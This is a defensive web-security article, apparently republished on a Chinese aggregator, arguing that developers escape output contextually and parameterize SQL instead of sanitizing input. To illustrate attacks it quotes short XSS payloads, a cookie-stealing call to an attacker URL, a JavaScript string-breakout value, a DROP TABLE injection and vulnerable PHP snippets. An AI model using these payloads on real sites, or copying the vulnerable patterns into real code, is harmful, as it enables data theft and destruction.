Don’t try to sanitize input – escape output

栏目: IT技术 · 发布时间: 4年前

内容简介：February 2020Every so often developers talk about “sanitizing user input” to prevent cross-site scripting attacks. This is well-intentioned, but leads to a false sense of security, and sometimes mangles perfectly good input.A website is vulnerable to cross

February 2020

Every so often developers talk about “sanitizing user input” to prevent cross-site scripting attacks. This is well-intentioned, but leads to a false sense of security, and sometimes mangles perfectly good input.

How does cross-site scripting happen?

A website is vulnerable to cross-site scripting (XSS) attacks if users can enter information that the site repeats back to them verbatim in a page’s HTML. This might cause minor issues (HTML that breaks the page layout) or major ones (JavaScript that sends the user’s login cookie to an attacker’s site).

Let’s walk through a concrete example:

NaiveSite allows you to enter your name, which is output as is on your profile page.
Billy the Kid enters his name as Billy <script>alert('Yo ho ho!')</script> .
Anyone who visits Billy’s profile page gets some HTML including the unescaped script tag, which their browser runs.
If the alert() were changed to something more malicious, like sendCookies('https://billy.com/cookie-monster') , Billy may now be collecting the unsuspecting visitor’s login information.

Side note: it isn’t quite this simple, as login cookies are usually marked HttpOnly , which means they’re not accessible to JavaScript. But this is NaiveSite, so it’s likely they made both an XSS mistake and a cookie one.

Why input filtering isn’t a great idea

The developer has heard of “input filtering” or “sanitizing input”, so they write some code to strip out unsafe HTML characters <>& from the name before storing it. Problem solved!

But there are two problems with this. For one, a couple might sign up to NaiveSite as Bob & Jane Smith , but the filtering code strips the & , and suddenly Bob is on his own, with a middle name of Jane.

Or if the filter is a bit more zealous and also strips ' and " , someone like Bill O’Brien becomes Bill OBrien. Messing up people’s names is not a good look.

Perhaps more importantly, it gives a false sense of security. What does “unsafe” mean? In what context? Sure, <>& are unsafe characters for HTML, but what about CSS, JSON, SQL, or even shell scripts? Those have a completely different set of unsafe characters.

For example, NaiveSite might have a PHP template that looks like this:

<html>
...
<script>
var name = "<?=$name?>";
</script>

If an attacker sets their name to include double quotes, like "; badFunc(); " , they can run arbitrary JavaScript on any NaiveSite pages that display the user’s name (which, if you’re logged in, is probably all of them).

Another example of this kind of thing is SQL injection, an attack that’s closely related to cross-site scripting. NaiveSite is powered by MySQL, and it finds users like so:

$query = "SELECT * FROM users WHERE name = '{$name}'"

When a boy named Robert'); DROP TABLE users; comes along, NaiveSite’s entire user database is deleted. Oops!

Incidentally, the mother in the xkcd comic says, “I hope you’ve learned to sanitize your database inputs.” Which is somewhat confusing, but I’ll give Randall the benefit of the doubt and assume he meant “escape your database parameters”.

In short, it’s no good to strip out “dangerous characters”, because some characters are dangerous in some contexts and perfectly safe in others.

Escape your output instead

The only code that knows what characters are dangerous is the code that’s outputting in a given context.

So the better approach is to store whatever name the user enters verbatim, and then have the template system HTML-escape when outputting HTML, or properly escape JSON when outputting JSON and JavaScript.

And of course use your SQL engine’s parameterized query features so it properly escapes variables when building SQL:

$stmt = $db->prepare('SELECT * FROM users WHERE name = ?');
$stmt->bind_param('s', $name);

This is sometimes called “contextual escaping”. If you happen to use Go’s html/template package, you get automatic contextual escaping for HTML, CSS, and JavaScript. Most other templating systems at least give you automatic HTML escaping, for example React, Jinja2, and Rails templates.

But what if you want raw input?

One tricky situation is when your app’s purpose is allowing a user to enter HTML or Markdown for display. In this case you can’t escape when rendering output, because the whole purpose is to allow users to add links, images, headings, etc.

So you have to take a different approach. If you’re using Markdown, you can either:

Allow them to only enter pure Markdown, and convert that to HTML on render (many Markdown libraries allow raw HTML by default; be sure to disable that). This is the most secure option, but also more restrictive.
Allow them to use HTML in the Markdown, but only a whitelist of allowed tags and attributes, such as <a href="..."> and <img src="..."> . Both Stack Exchange and GitHub take this second approach.

If you’re not using Markdown but want to let your users enter HTML directly, you only have the second option – you must filter using a whitelist. This is harder to get right than you’d think (for example, <img src="x" onerror="badFunc()"> ), so be sure to use a mature, security-vetted library like DOMPurify .

So in cases where you do need to “echo” raw user input, carefully filter input based on a restrictive whitelist, and store the result in the database. When you come to output it, output it as stored without escaping.

The parallel for SQL injection might be if you’re building a data charting tool that allows users to enter arbitrary SQL queries. You might want to allow them to enter SELECT queries but not data-modification queries. In these cases you’re best off using a proper SQL parser ( like this one ) to ensure it’s a well-formed SELECT query – but doing this correctly is not trivial, so be sure to get security review.

What about validation?

Input sanitization is usually a bad idea, but input validation is a good thing.

For example, when you’re parsing form fields, and you have a number field that’s not a number, or an email address without an @ , or a “post status” drop-down that can only be one of draft , published , or archived – then by all means validate it and return an error if it’s invalid.

Good web form validation shows errors inline so the user knows exactly what to fix:

Don’t try to sanitize input – escape output

You must do validation at least on the backend, otherwise an attacker could bypass the frontend validation and POST bogus data to your endpoint directly. In addition, you can also validate early on the frontend to show errors more real-time, without a round trip to the server.

There’s also a StackOverflow answer to “How can I sanitize user input with PHP?” that is somewhat PHP-specific, but I found it succinct and helpful. It links to a page on PHP magic quotes , which were a bad idea and actually removed in PHP 5.4 – the discussion there is very much in line with what I’ve written above.

If you have any feedback on this article, please get in touch!

以上就是本文的全部内容，希望本文的内容对大家的学习或者工作能带来一定的帮助，也希望大家多多支持码农网

查看所有标签

猜你喜欢:

Don’t try to sanitize input – escape output

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

C语言入门经典

霍顿 (Ivor Horton) / 清华大学出版社 / 2008-4-1 / 69.80元

本书是编程语言先驱者Ivor Horton的经典之作，是C语言方面最畅销的图书品种之一。本书集综合性、实用性为一体，是学习C语言的优秀入门教材，在世界范围内广受欢迎，口碑极佳。书中除了讲解C程序设计语言，还广泛介绍了作为一名C程序设计人员应该掌握的必要知识，并提供了大量的实用性很强的编程实例。本书的目标是使你在C语言程序设计方面由一位初学者成为一位称职的程序员。读者基本不需要具备任何编程知识，即可......一起来看看《C语言入门经典》这本书的介绍吧!

码农工具